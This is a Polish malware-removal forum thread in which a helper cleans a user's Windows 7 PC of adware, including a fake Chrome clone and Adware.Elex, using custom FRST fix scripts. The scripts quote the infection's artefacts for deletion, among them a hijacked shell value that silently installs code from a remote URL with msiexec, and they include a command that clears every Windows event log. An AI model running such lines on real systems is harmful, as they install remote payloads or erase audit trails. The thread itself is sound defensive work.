Buum Opublikowano 3 Stycznia 2018 Zgłoś Udostępnij Opublikowano 3 Stycznia 2018 Witam, od prawie roku wzmagam się z problemem z kompozycjami windows 7 błąd 1075. Próbowałem wielu sposobów, żaden nie był skuteczny. Na forum znalazłem identyczny problem : https://www.fixitpc.pl/topic/32013-brak-kompozycji-aero/ jednakże sam nie jestem w stanie tego naprawić. W załączeniu przesyłam skany FRST. Z góry dziękuję za pomoc! Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 3 Stycznia 2018 Zgłoś Udostępnij Opublikowano 3 Stycznia 2018 Ja nie jestem moderatorem w tym dziale, więc nie mogę przenieść tego tematu do swojego działu, którym się opiekuję (dział pomocy doraźnej, czyli leczenia zainfekowanych platform Microsoft). Później zrobi to inny moderator, który ma tu dostęp. W systemie został podstawiony fałszywy klon Google Chrome Dopig z wbudowanym adware, który całkowicie zastąpił Chrome. Skróty, które uruchamiasz wywołują klon a nie prawdziwe Chrome. Podobnie ma się sytuację z przeglądarką Mozilla FireFox, której nie masz zainstalowanej w oryginalnej wersji, ale adware podstawiło fałszywą. Poza tym, mnóstwo innych aplikacji i modyfikacji adware. Jeśli chodzi zaś o problem tytułowy to on również jest spowodowany przez infekcje, a dokładnie wariant Adware.Elex, który zmodyfikował usługę Themes. Przeczytaj obowiązkową lekturę na temat zabezpieczenia się pod takimi sytuacjami: Portale z oprogramowaniem / Instalatory - na co uważać. 1. Za pomocą narzędzia Program Install and Uninstall Troubleshooter odinstaluj adware / PUP: AlphaGo (trzy pozycje do deinstalacji), amuleC (jedna pozycja to deinstalacji) 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\ChromeHTML: -> C:\Program Files (x86)\Dopig\Application\chrome.exe (Google Inc.) C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Program Files (x86)\Dopig C:\Users\Hubert\AppData\Local\Dopig C:\Users\Hubert\AppData\Roaming\Dopig C:\Program Files (x86)\FireFox C:\Users\Hubert\AppData\Local\FireFox C:\Users\Hubert\AppData\Roaming\FireFox DeleteKey: HKCU\Software\Dopig DeleteKey: HKLM\SOFTWARE\WOW6432Node\Dopig DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {1CB03AA5-7AC0-4E6C-92FD-87AE62BF1E42} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 Task: {6CD70A5B-CFF0-436C-A6B0-68C7E9499088} - System32\Tasks\WinTOOL => C:\ProgramData\wintools\WintoolUprI.exe [2017-01-25] () C:\windows\psgo C:\ProgramData\wintools C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk MSCONFIG\startupreg: background_fault => "C:\Users\Hubert\AppData\Local\background_fault\aswRD.exe" "C:\Users\Hubert\AppData\Local\background_fault\bf.dll",background_fault_collector MSCONFIG\startupreg: Tv-Plug-In => "C:\Program Files (x86)\Tv-Plug-In\Tv-Plug-In.exe" nogui C:\Users\Hubert\AppData\Local\background_fault HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Run: [CW] => [X] HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88NWIdRTkxRYMdM8I1OTqyRkIyOWQQFjLWRjM2OUVYNc== /q GroupPolicy\User: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494321649&z=56e83df585b09ddfdebb057gdz1t9z3c6oeg4qcz9z&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494321649&z=56e83df585b09ddfdebb057gdz1t9z3c6oeg4qcz9z&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1482829952&z=0e8602fd9c6354b14182cbcgazbb1o1b9obtctczbb&from=archer1028&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494321649&z=56e83df585b09ddfdebb057gdz1t9z3c6oeg4qcz9z&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1482829952&z=0e8602fd9c6354b14182cbcgazbb1o1b9obtctczbb&from=archer1028&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} SearchScopes: HKU\S-1-5-21-2619517641-3271199866-1137362701-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494836168&z=0a75cbe4ae5d67e770e0b7dgdzat2z3beccq8geqam&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} S2 GubedZL; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S2 GubZL; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S2 Archer; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) S2 CSHMDR; C:\Users\Hubert\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 glory; C:\Users\Hubert\AppData\Local\glory\glory.dll [809984 2017-06-02] (glory) [brak podpisu cyfrowego] S2 MSLN; C:\ProgramData\Microsoft\Phone Tools\CoreCon\12.0\1042\NonSDKAddonLangVer.dll [475648 2016-12-28] () [brak podpisu cyfrowego] R2 MVCSrv; C:\ProgramData\Package Cache\{0C8D9D70-FA5A-4CA9-763F-D8D93BC099B6}v10.1.14393.795\Installers\Universal_CRT_Tools_x86-x86_en-us.dll [108544 2017-04-05] () [brak podpisu cyfrowego] S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Corporation) [DependOnService: iThemes5] R2 WinUpdateSrv; C:\ProgramData\Package Cache\{137DE25F-7C3C-DEFE-C45B-990088714B67}v12.2.2793.254\Update\install.dll [104448 2017-05-05] () [brak podpisu cyfrowego] C:\Users\Hubert\AppData\Local\CSHMDR C:\Users\Hubert\AppData\Local\glory VirusTotal: C:\ProgramData\Microsoft\Phone Tools\CoreCon\12.0\1042\NonSDKAddonLangVer.dll VirusTotal: C:\ProgramData\Package Cache\{0C8D9D70-FA5A-4CA9-763F-D8D93BC099B6}v10.1.14393.795\Installers\Universal_CRT_Tools_x86-x86_en-us.dll VirusTotal: C:\ProgramData\Package Cache\{137DE25F-7C3C-DEFE-C45B-990088714B67}v12.2.2793.254\Update\install.dll U0 aswVmm; Brak ImagePath U2 CWASRE; Brak ImagePath U2 snare; Brak ImagePath U3 TBS; Brak ImagePath U2 WinSnare; Brak ImagePath S3 dbx; system32\DRIVERS\dbx.sys [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 L1C; system32\DRIVERS\L1C62x64.sys [X] S2 CornerSunshineSvc; "C:\Program Files (x86)\Corner Sunshine\CornerSunshineSvc.exe" {8A712DBD-E08B-4D5C-839D-1B9C185FE769} [X] S3 aswHdsKe; \??\C:\Windows\system32\drivers\aswHdsKe.sys [X] 2018-01-02 17:42 - 2018-01-02 17:42 - 000000000 ____D C:\Users\Hubert\AppData\Roaming\Solvusoft 2018-01-02 17:41 - 2018-01-02 17:42 - 000000000 ____D C:\ProgramData\Solvusoft 2018-01-02 18:21 - 2017-04-27 19:01 - 000000000 ____D C:\Windows\system32\1033 2018-01-03 19:12 - 2016-09-19 09:09 - 000000481 _____ C:\Users\Public\Documents\temp.dat 2018-01-02 13:54 - 2016-09-19 09:09 - 000000000 _____ C:\Users\Public\Documents\report.dat 2017-01-13 23:50 - 2017-01-13 23:50 - 000000000 _____ () C:\Program Files (x86)\metadata 2017-01-13 23:50 - 2017-03-04 18:10 - 000000040 _____ () C:\Program Files (x86)\settings.dat C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\Tibia Map Viewer.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\View documentation.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia Website.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Uninstall Tibia.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Network Status.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\PokerStars.eu.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Uninstall PokerStars.eu.lnk C:\Users\Hubert\Desktop\Karola\Karolina\Connectify.lnk C:\Users\Hubert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Antaris\Antaris.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Hubert\AppData\Local\Mozilla C:\Users\Hubert\AppData\Roaming\Mozilla C:\Users\Hubert\AppData\Roaming\Profiles Reg: reg query HKLM\SYSTEM\CurrentControlSet\Services\Themes /s CMD: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Otwórz Google Chrome: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > utwórz nową Osobę, zaloguj się na nią > wejdź ponownie do opcji i skasuj wszystkie poprzednie Osoby. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). dopig;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Buum Opublikowano 4 Stycznia 2018 Autor Zgłoś Udostępnij Opublikowano 4 Stycznia 2018 Niesamowite... KOMPOZYCJE DZIAŁAJĄ! Co lepsze to komputer jakby przyśpieszył o kilka razy, wow. W załączeniu przesyłam wszystkie skany, mam nadzieje że wszystkie. Fixlog.txt SearchReg.txt Skan Malwarebytes.txt Addition.txt Shortcut.txt FRST.txt Odnośnik do komentarza
Miszel03 Opublikowano 4 Stycznia 2018 Zgłoś Udostępnij Opublikowano 4 Stycznia 2018 Co lepsze to komputer jakby przyśpieszył o kilka razy, wow. Zostały usunięte praktycznie wszystkie aktywne infekcje, a gdy usuniemy po nich resztki będzie jeszcze lepiej. Niestety, ale przeglądarka Google Chrome została zmodyfikowana przez adware za pomocą preferencji - takie modyfikacje trudno usunąć tak, aby nie wytworzyć dodatkowych problemów (ja np. nie zgadzam się całkowicie z podejściem zamiany plików - żeby był porządek najlepiej jest przeprowadzić reinstalacje - w ten sposób uniknie się skutków ubocznych). Po za tym jest dużo lepiej, ale jeszcze nie osiadamy na laurach. Trzeba zrobić spore poprawki, by całkowicie usunąć resztki po infekcjach. Wyniki z Malwarebytes póki co pomijam (w skrypcie będę teraz poprawki doczyszczające do moich wcześniejszych działań), bo są tam elementy preferencji, o których wyżej pisałem. Przeprowadzisz skan jeszcze raz w pkt. 3. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\29069fe7_0 DeleteKey: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\e4b123f0_0 DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\Firefox.exe DeleteKey: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\92763c4c_0 DeleteKey: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\9eac0a35_0 DeleteVaule: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.accdb\OpenWithList|Firefox.exe DeleteVaule: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithList|Firefox.exe DeleteVaule: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList|Firefox.exe DeleteVaule: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sql\OpenWithList|Firefox.exe DeleteKey: HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{19539992-061C-4E8B-9053-07B175303AF4} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = C:\ProgramData\Microsoft\Phone Tools\CoreCon\12.0\1042\NonSDKAddonLangVer.dll C:\ProgramData\Package Cache\{0C8D9D70-FA5A-4CA9-763F-D8D93BC099B6}v10.1.14393.795\Installers\Universal_CRT_Tools_x86-x86_en-us.dll C:\ProgramData\Package Cache\{137DE25F-7C3C-DEFE-C45B-990088714B67}v12.2.2793.254\Update\install.dll EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Kompleksowo przeinstaluj przeglądarkę Google Chrome: Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. 3. Ponów skan Malwarebytes, w przypadku detekcji nie podejmuj żadnej akcji - przedstaw raport w celu przeanalizowania wyników. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Buum Opublikowano 4 Stycznia 2018 Autor Zgłoś Udostępnij Opublikowano 4 Stycznia 2018 Jeżeli chodzi o pkt. 2 to przeglądarka Google Chrome jest/była moją poboczną przeglądarką którą bardzo żadko używałem. Dlatego została całkiem usunięta z mojego komputera. W załączeniu przesyłam pliki po ponownym skanie. Skan Malwarebytes.txt Addition.txt Fixlog.txt FRST.txt Odnośnik do komentarza
Miszel03 Opublikowano 5 Stycznia 2018 Zgłoś Udostępnij Opublikowano 5 Stycznia 2018 Zbliżamy się do finalizacji. 1. Zagrożenia wykryte przez Malwarebytes daj do kasacji. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses:CreateRestorePoint:DeleteValue: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.accdb\OpenWithList|Firefox.exeDeleteValue: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.docx\OpenWithList|Firefox.exeDeleteValue: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList|Firefox.exeDeleteValue: HKEY_USERS\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.sql\OpenWithList|Firefox.exeDeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions C:\USERS\HUBERT\APPDATA\ROAMING\ELEX-TECHEmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Przedstaw plik Fixlog, napisz jak oceniasz obecny stan systemu. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się